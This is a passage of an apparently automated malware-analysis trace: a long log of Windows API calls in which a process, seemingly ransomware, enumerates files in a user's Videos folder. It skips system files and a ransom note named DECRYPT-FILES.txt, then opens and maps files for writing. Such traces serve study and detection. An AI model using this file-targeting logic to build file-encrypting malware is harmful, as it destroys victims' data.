(lpString1="Rw_rswFYcem6TM.mp4.z1W12f3", lpString2="autorun.inf") returned 1 [0186.226] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4.z1W12f3", lpString2="boot.ini") returned 1 [0186.226] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4.z1W12f3", lpString2="desktop.ini") returned 1 [0186.226] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4.z1W12f3", lpString2="ntuser.dat") returned 1 [0186.226] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4.z1W12f3", lpString2="iconcache.db") returned 1 [0186.226] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4.z1W12f3", lpString2="bootsect.bak") returned 1 [0186.226] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4.z1W12f3", lpString2="ntuser.dat.log") returned 1 [0186.227] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4.z1W12f3", lpString2="thumbs.db") returned -1 [0186.227] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4.z1W12f3", lpString2="Bootfont.bin") returned 1 [0186.227] lstrlenW (lpString="Rw_rswFYcem6TM.mp4.z1W12f3") returned 26 [0186.227] lstrcmpiW (lpString1="z1W12f3", lpString2="lnk") returned 1 [0186.227] lstrcmpiW (lpString1="z1W12f3", lpString2="exe") returned 1 [0186.227] lstrcmpiW (lpString1="z1W12f3", lpString2="sys") returned 1 [0186.227] lstrcmpiW (lpString1="z1W12f3", lpString2="dll") returned 1 [0186.227] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.227] lstrlenW (lpString="Rw_rswFYcem6TM.mp4.z1W12f3") returned 26 [0186.227] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.227] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="Rw_rswFYcem6TM.mp4.z1W12f3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\Rw_rswFYcem6TM.mp4.z1W12f3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\Rw_rswFYcem6TM.mp4.z1W12f3" [0186.227] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.227] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\Rw_rswFYcem6TM.mp4.z1W12f3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\rw_rswfycem6tm.mp4.z1w12f3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.227] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=7894) returned 1 [0186.227] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.227] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.228] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.228] CloseHandle (hObject=0x268) returned 1 [0186.228] CloseHandle (hObject=0x264) returned 1 [0186.228] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.228] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef8b4550, ftCreationTime.dwHighDateTime=0x1d4ccf6, ftLastAccessTime.dwLowDateTime=0xce654d40, ftLastAccessTime.dwHighDateTime=0x1d4c755, ftLastWriteTime.dwLowDateTime=0xb0616ee0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xb955, dwReserved0=0x0, dwReserved1=0x0, cFileName="s4JsesqKNz4f.avi.vpXRp", cAlternateFileName="S4JSES~1.VPX")) returned 1 [0186.229] lstrcmpiW (lpString1="s4JsesqKNz4f.avi.vpXRp", lpString2="DECRYPT-FILES.txt") returned 1 [0186.229] lstrcmpiW (lpString1="s4JsesqKNz4f.avi.vpXRp", lpString2="autorun.inf") returned 1 [0186.229] lstrcmpiW (lpString1="s4JsesqKNz4f.avi.vpXRp", lpString2="boot.ini") returned 1 [0186.229] lstrcmpiW (lpString1="s4JsesqKNz4f.avi.vpXRp", lpString2="desktop.ini") returned 1 [0186.229] lstrcmpiW (lpString1="s4JsesqKNz4f.avi.vpXRp", lpString2="ntuser.dat") returned 1 [0186.229] lstrcmpiW (lpString1="s4JsesqKNz4f.avi.vpXRp", lpString2="iconcache.db") returned 1 [0186.229] lstrcmpiW (lpString1="s4JsesqKNz4f.avi.vpXRp", lpString2="bootsect.bak") returned 1 [0186.229] lstrcmpiW (lpString1="s4JsesqKNz4f.avi.vpXRp", lpString2="ntuser.dat.log") returned 1 [0186.229] lstrcmpiW (lpString1="s4JsesqKNz4f.avi.vpXRp", lpString2="thumbs.db") returned -1 [0186.229] lstrcmpiW (lpString1="s4JsesqKNz4f.avi.vpXRp", lpString2="Bootfont.bin") returned 1 [0186.229] lstrlenW (lpString="s4JsesqKNz4f.avi.vpXRp") returned 22 [0186.229] lstrcmpiW (lpString1="vpXRp", lpString2="lnk") returned 1 [0186.229] lstrcmpiW (lpString1="vpXRp", lpString2="exe") returned 1 [0186.229] lstrcmpiW (lpString1="vpXRp", lpString2="sys") returned 1 [0186.229] lstrcmpiW (lpString1="vpXRp", lpString2="dll") returned 1 [0186.229] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.229] lstrlenW (lpString="s4JsesqKNz4f.avi.vpXRp") returned 22 [0186.229] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.229] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="s4JsesqKNz4f.avi.vpXRp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\s4JsesqKNz4f.avi.vpXRp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\s4JsesqKNz4f.avi.vpXRp" [0186.229] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.229] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\s4JsesqKNz4f.avi.vpXRp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\s4jsesqknz4f.avi.vpxrp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.230] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=47445) returned 1 [0186.230] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.230] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.230] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.230] CloseHandle (hObject=0x268) returned 1 [0186.230] CloseHandle (hObject=0x264) returned 1 [0186.231] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.231] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ff9a450, ftCreationTime.dwHighDateTime=0x1d4cae3, ftLastAccessTime.dwLowDateTime=0x5b4ad9a0, ftLastAccessTime.dwHighDateTime=0x1d4ca30, ftLastWriteTime.dwLowDateTime=0xb063d040, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x15d23, dwReserved0=0x0, dwReserved1=0x0, cFileName="UoljSEj8Z06B.flv.OoWZ0", cAlternateFileName="UOLJSE~1.OOW")) returned 1 [0186.231] lstrcmpiW (lpString1="UoljSEj8Z06B.flv.OoWZ0", lpString2="DECRYPT-FILES.txt") returned 1 [0186.231] lstrcmpiW (lpString1="UoljSEj8Z06B.flv.OoWZ0", lpString2="autorun.inf") returned 1 [0186.231] lstrcmpiW (lpString1="UoljSEj8Z06B.flv.OoWZ0", lpString2="boot.ini") returned 1 [0186.231] lstrcmpiW (lpString1="UoljSEj8Z06B.flv.OoWZ0", lpString2="desktop.ini") returned 1 [0186.231] lstrcmpiW (lpString1="UoljSEj8Z06B.flv.OoWZ0", lpString2="ntuser.dat") returned 1 [0186.231] lstrcmpiW (lpString1="UoljSEj8Z06B.flv.OoWZ0", lpString2="iconcache.db") returned 1 [0186.231] lstrcmpiW (lpString1="UoljSEj8Z06B.flv.OoWZ0", lpString2="bootsect.bak") returned 1 [0186.231] lstrcmpiW (lpString1="UoljSEj8Z06B.flv.OoWZ0", lpString2="ntuser.dat.log") returned 1 [0186.231] lstrcmpiW (lpString1="UoljSEj8Z06B.flv.OoWZ0", lpString2="thumbs.db") returned 1 [0186.231] lstrcmpiW (lpString1="UoljSEj8Z06B.flv.OoWZ0", lpString2="Bootfont.bin") returned 1 [0186.231] lstrlenW (lpString="UoljSEj8Z06B.flv.OoWZ0") returned 22 [0186.231] lstrcmpiW (lpString1="OoWZ0", lpString2="lnk") returned 1 [0186.231] lstrcmpiW (lpString1="OoWZ0", lpString2="exe") returned 1 [0186.231] lstrcmpiW (lpString1="OoWZ0", lpString2="sys") returned -1 [0186.231] lstrcmpiW (lpString1="OoWZ0", lpString2="dll") returned 1 [0186.231] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.231] lstrlenW (lpString="UoljSEj8Z06B.flv.OoWZ0") returned 22 [0186.231] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.231] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="UoljSEj8Z06B.flv.OoWZ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UoljSEj8Z06B.flv.OoWZ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UoljSEj8Z06B.flv.OoWZ0" [0186.231] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.232] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UoljSEj8Z06B.flv.OoWZ0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\uoljsej8z06b.flv.oowz0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.232] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=89379) returned 1 [0186.232] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.232] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.233] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.233] CloseHandle (hObject=0x268) returned 1 [0186.233] CloseHandle (hObject=0x264) returned 1 [0186.233] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.233] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79930ff0, ftCreationTime.dwHighDateTime=0x1d4ca5c, ftLastAccessTime.dwLowDateTime=0xd297da80, ftLastAccessTime.dwHighDateTime=0x1d4ca62, ftLastWriteTime.dwLowDateTime=0xb0689300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfe8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="UTIc28qGYhgAyb46g.avi.SWg1lj", cAlternateFileName="UTIC28~1.SWG")) returned 1 [0186.233] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi.SWg1lj", lpString2="DECRYPT-FILES.txt") returned 1 [0186.233] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi.SWg1lj", lpString2="autorun.inf") returned 1 [0186.233] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi.SWg1lj", lpString2="boot.ini") returned 1 [0186.233] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi.SWg1lj", lpString2="desktop.ini") returned 1 [0186.233] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi.SWg1lj", lpString2="ntuser.dat") returned 1 [0186.233] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi.SWg1lj", lpString2="iconcache.db") returned 1 [0186.233] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi.SWg1lj", lpString2="bootsect.bak") returned 1 [0186.233] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi.SWg1lj", lpString2="ntuser.dat.log") returned 1 [0186.233] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi.SWg1lj", lpString2="thumbs.db") returned 1 [0186.233] lstrcmpiW (lpString1="UTIc28qGYhgAyb46g.avi.SWg1lj", lpString2="Bootfont.bin") returned 1 [0186.233] lstrlenW (lpString="UTIc28qGYhgAyb46g.avi.SWg1lj") returned 28 [0186.233] lstrcmpiW (lpString1="SWg1lj", lpString2="lnk") returned 1 [0186.233] lstrcmpiW (lpString1="SWg1lj", lpString2="exe") returned 1 [0186.233] lstrcmpiW (lpString1="SWg1lj", lpString2="sys") returned -1 [0186.233] lstrcmpiW (lpString1="SWg1lj", lpString2="dll") returned 1 [0186.233] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.233] lstrlenW (lpString="UTIc28qGYhgAyb46g.avi.SWg1lj") returned 28 [0186.233] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.234] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="UTIc28qGYhgAyb46g.avi.SWg1lj" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UTIc28qGYhgAyb46g.avi.SWg1lj") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UTIc28qGYhgAyb46g.avi.SWg1lj" [0186.234] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.234] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\UTIc28qGYhgAyb46g.avi.SWg1lj" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\utic28qgyhgayb46g.avi.swg1lj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.234] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=65162) returned 1 [0186.234] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.234] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.235] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.235] CloseHandle (hObject=0x268) returned 1 [0186.235] CloseHandle (hObject=0x264) returned 1 [0186.235] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.235] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62dfe770, ftCreationTime.dwHighDateTime=0x1d4c619, ftLastAccessTime.dwLowDateTime=0xc4dbb500, ftLastAccessTime.dwHighDateTime=0x1d4c793, ftLastWriteTime.dwLowDateTime=0xb06af460, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x7457, dwReserved0=0x0, dwReserved1=0x0, cFileName="vpyzRTKDjrNi.flv.k56uSW", cAlternateFileName="VPYZRT~1.K56")) returned 1 [0186.235] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv.k56uSW", lpString2="DECRYPT-FILES.txt") returned 1 [0186.235] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv.k56uSW", lpString2="autorun.inf") returned 1 [0186.235] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv.k56uSW", lpString2="boot.ini") returned 1 [0186.235] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv.k56uSW", lpString2="desktop.ini") returned 1 [0186.235] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv.k56uSW", lpString2="ntuser.dat") returned 1 [0186.235] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv.k56uSW", lpString2="iconcache.db") returned 1 [0186.235] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv.k56uSW", lpString2="bootsect.bak") returned 1 [0186.235] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv.k56uSW", lpString2="ntuser.dat.log") returned 1 [0186.235] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv.k56uSW", lpString2="thumbs.db") returned 1 [0186.235] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv.k56uSW", lpString2="Bootfont.bin") returned 1 [0186.236] lstrlenW (lpString="vpyzRTKDjrNi.flv.k56uSW") returned 23 [0186.236] lstrcmpiW (lpString1="k56uSW", lpString2="lnk") returned -1 [0186.236] lstrcmpiW (lpString1="k56uSW", lpString2="exe") returned 1 [0186.236] lstrcmpiW (lpString1="k56uSW", lpString2="sys") returned -1 [0186.236] lstrcmpiW (lpString1="k56uSW", lpString2="dll") returned 1 [0186.236] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.236] lstrlenW (lpString="vpyzRTKDjrNi.flv.k56uSW") returned 23 [0186.236] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.236] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="vpyzRTKDjrNi.flv.k56uSW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\vpyzRTKDjrNi.flv.k56uSW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\vpyzRTKDjrNi.flv.k56uSW" [0186.236] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\vpyzRTKDjrNi.flv.k56uSW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\vpyzrtkdjrni.flv.k56usw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.236] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=29783) returned 1 [0186.236] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.236] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.237] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.237] CloseHandle (hObject=0x268) returned 1 [0186.237] CloseHandle (hObject=0x264) returned 1 [0186.237] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.237] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d751d0, ftCreationTime.dwHighDateTime=0x1d4d080, ftLastAccessTime.dwLowDateTime=0x6e848cd0, ftLastAccessTime.dwHighDateTime=0x1d4ceb5, ftLastWriteTime.dwLowDateTime=0xb06fb720, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x155d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="WS2pNj.mp4.xggf", cAlternateFileName="WS2PNJ~1.XGG")) returned 1 [0186.238] lstrcmpiW (lpString1="WS2pNj.mp4.xggf", lpString2="DECRYPT-FILES.txt") returned 1 [0186.238] lstrcmpiW (lpString1="WS2pNj.mp4.xggf", lpString2="autorun.inf") returned 1 [0186.238] lstrcmpiW (lpString1="WS2pNj.mp4.xggf", lpString2="boot.ini") returned 1 [0186.238] lstrcmpiW (lpString1="WS2pNj.mp4.xggf", lpString2="desktop.ini") returned 1 [0186.238] lstrcmpiW (lpString1="WS2pNj.mp4.xggf", lpString2="ntuser.dat") returned 1 [0186.238] lstrcmpiW (lpString1="WS2pNj.mp4.xggf", lpString2="iconcache.db") returned 1 [0186.238] lstrcmpiW (lpString1="WS2pNj.mp4.xggf", lpString2="bootsect.bak") returned 1 [0186.238] lstrcmpiW (lpString1="WS2pNj.mp4.xggf", lpString2="ntuser.dat.log") returned 1 [0186.238] lstrcmpiW (lpString1="WS2pNj.mp4.xggf", lpString2="thumbs.db") returned 1 [0186.238] lstrcmpiW (lpString1="WS2pNj.mp4.xggf", lpString2="Bootfont.bin") returned 1 [0186.238] lstrlenW (lpString="WS2pNj.mp4.xggf") returned 15 [0186.238] lstrcmpiW (lpString1="xggf", lpString2="lnk") returned 1 [0186.238] lstrcmpiW (lpString1="xggf", lpString2="exe") returned 1 [0186.238] lstrcmpiW (lpString1="xggf", lpString2="sys") returned 1 [0186.238] lstrcmpiW (lpString1="xggf", lpString2="dll") returned 1 [0186.238] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.238] lstrlenW (lpString="WS2pNj.mp4.xggf") returned 15 [0186.238] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.238] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="WS2pNj.mp4.xggf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\WS2pNj.mp4.xggf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\WS2pNj.mp4.xggf" [0186.238] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.238] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\WS2pNj.mp4.xggf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ws2pnj.mp4.xggf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.238] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=87507) returned 1 [0186.239] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.239] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.239] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.239] CloseHandle (hObject=0x268) returned 1 [0186.239] CloseHandle (hObject=0x264) returned 1 [0186.239] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.240] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x330b9a10, ftCreationTime.dwHighDateTime=0x1d4c80f, ftLastAccessTime.dwLowDateTime=0x6199a210, ftLastAccessTime.dwHighDateTime=0x1d4c5e8, ftLastWriteTime.dwLowDateTime=0xb0721880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6e26, dwReserved0=0x0, dwReserved1=0x0, cFileName="xgEKJiGuAv6jN.flv.Ud6R", cAlternateFileName="XGEKJI~1.UD6")) returned 1 [0186.240] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv.Ud6R", lpString2="DECRYPT-FILES.txt") returned 1 [0186.240] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv.Ud6R", lpString2="autorun.inf") returned 1 [0186.240] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv.Ud6R", lpString2="boot.ini") returned 1 [0186.240] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv.Ud6R", lpString2="desktop.ini") returned 1 [0186.240] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv.Ud6R", lpString2="ntuser.dat") returned 1 [0186.240] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv.Ud6R", lpString2="iconcache.db") returned 1 [0186.240] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv.Ud6R", lpString2="bootsect.bak") returned 